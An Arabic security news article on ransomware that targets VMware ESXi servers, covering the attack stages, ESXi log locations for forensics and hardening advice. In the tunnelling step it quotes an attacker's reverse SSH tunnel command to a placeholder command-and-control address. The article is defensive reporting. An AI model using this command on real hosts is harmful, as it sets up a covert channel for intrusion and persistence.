برامج الفدية الجديدة تستهدف خوادم VMware ESXi عبر أنفاق SSH خادعة

تستهدف سلالات جديدة من برامج الفدية مضيفي VMware ESXi، وتستفيد من أنفاق SSH لإخفاء النشاط الضار كحركة مرور مشروعة على الشبكة.

Muhammad Talha Javaid

تستهدف سلالات جديدة من برامج الفدية خوادم VMware ESXi، مستغلة أنفاق SSH لإخفاء النشاط الضار كحركة مرور شبكية شرعية.

تتيح هذه التكتيكات المتخفية للمهاجمين اختراق البيئات الافتراضية الحرجة، مع تجنب طرق الكشف التقليدية.

لماذا خوادم ESXi معرضة للخطر؟

يستغل المهاجمون الطبيعة المهملة غالبًا لأجهزة ESXi التي نادرًا ما يتم مراقبتها عن كثب. من خلال التخفي في الأنشطة العادية، يمكن للمهاجمين تصدير البيانات، نشر برامج الفدية، وحظر الأجهزة الافتراضية بأقل قدر من الكشف.

تسمح خوادم ESXi للمهاجمين بتشفير جميع الأقراص الافتراضية دفعة واحدة، مما يخلق هجومًا مركزيًا يمكن أن يشل البنية التحتية بالكامل.

من خلال إنشاء أنفاق SSH تعتمد على SOCKS، يمكن للمهاجمين التحرك أفقيًا ومزج حركة المرور الضارة مع النشاط الإداري الروتيني. ومع قلة إعادة تشغيل أجهزة ESXi ونقص تسجيل الأنشطة، توفر هذه الأجهزة بيئة مثالية للأبواب الخلفية المستمرة.

تشريح الهجوم

1. الوصول الأولي
يستغل المهاجمون الثغرات غير المُرقعة، مثل CVE-2021-21974، أو يستخدمون بيانات اعتماد إدارية مسروقة لتجاوز المصادقة والسيطرة على خوادم ESXi.

2. إنشاء أنفاق SSH
بعد الوصول، يستغل المهاجمون الوظائف الأصلية لـ SSH في ESXi لإنشاء أنفاق SOCKS، ما يسمح بتوجيه حركة المرور الضارة عبر الخادم مع التهرب من الكشف.
على سبيل المثال، يُنشئ الأمر:

على سبيل المثال، أمر مثل ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address> ينشئ رابطًا بعيدًا لإعادة توجيه المنفذ بين المضيف المخترق وخادم القيادة والتحكم (C2) الخاص بالمهاجم.

3. الحفاظ على التواجد المستمر
نظرًا لأن خوادم ESXi نادرًا ما يتم إعادة تشغيلها، يحتفظ المهاجمون بأبواب خلفية شبه مستمرة باستخدام نفق SSH، مما يُمكّنهم من مواصلة العمليات دون اكتشاف.

4. الاستطلاع والحركة الأفقية
باستخدام النفق المُنشأ، يقوم المهاجمون بمسح الشبكة، تحديد الأهداف الحساسة، وجمع المعلومات الاستخبارية.

5. نشر برامج الفدية
بعد اكتمال الاستطلاع، ينشر المهاجمون برامج الفدية لتشفير الملفات الافتراضية الحرجة، مثل .vmdk (الأقراص الافتراضية) و**.vmem** (ملفات الترحيل). هذا يؤدي فعليًا إلى حظر البيئات بالكامل. غالبًا ما تكون مطالب الفدية مصحوبة بتهديدات بتصدير البيانات أو الكشف عنها علنًا.

التحديات في الكشف والتخفيف

هيكل التسجيل اللامركزي لخوادم ESXi يعقد عملية التحليل الجنائي. يتم توزيع السجلات عبر ملفات متعددة، مثل:

/var/log/shell.log (نشاط القشرة)
/var/log/auth.log (أحداث المصادقة)
مما يتطلب من المحققين تجميع الأدلة.

بالإضافة إلى ذلك، تُخفي أنفاق SSH النشاط الضار كحركة مرور إدارية عادية، مما يجعل من الصعب تحديد العمليات غير المصرح بها.

تفشل العديد من المؤسسات في مراقبة خوادم ESXi بنشاط، مما يسمح لهذه الهجمات بالاستمرار لفترات طويلة دون ملاحظة.

تعزيز أمان ESXi

لمواجهة هذه التكتيكات المتقدمة، يوصي الباحثون باتخاذ التدابير التالية:

تقييد الامتيازات الإدارية: قصر الوصول إلى أجهزة ESXi على الموظفين الضروريين فقط.
تعطيل SSH افتراضيًا: تمكين الوصول إلى SSH فقط عند الضرورة القصوى ومراقبته عن كثب.
تطبيق التصحيحات بانتظام: معالجة الثغرات التي تسمح بتنفيذ التعليمات البرمجية عن بُعد أو سرقة بيانات الاعتماد، خاصةً الثغرات ذات الخطورة العالية.
فرض مصادقة قوية: تنفيذ آليات مصادقة قوية، بما في ذلك المصادقة متعددة العوامل، لمنع الهجمات الوحشية.
تسلط هذه الموجة الجديدة من برامج الفدية الضوء على كيفية تطور المهاجمين لاستغلال الجوانب المهملة للبنية التحتية الافتراضية.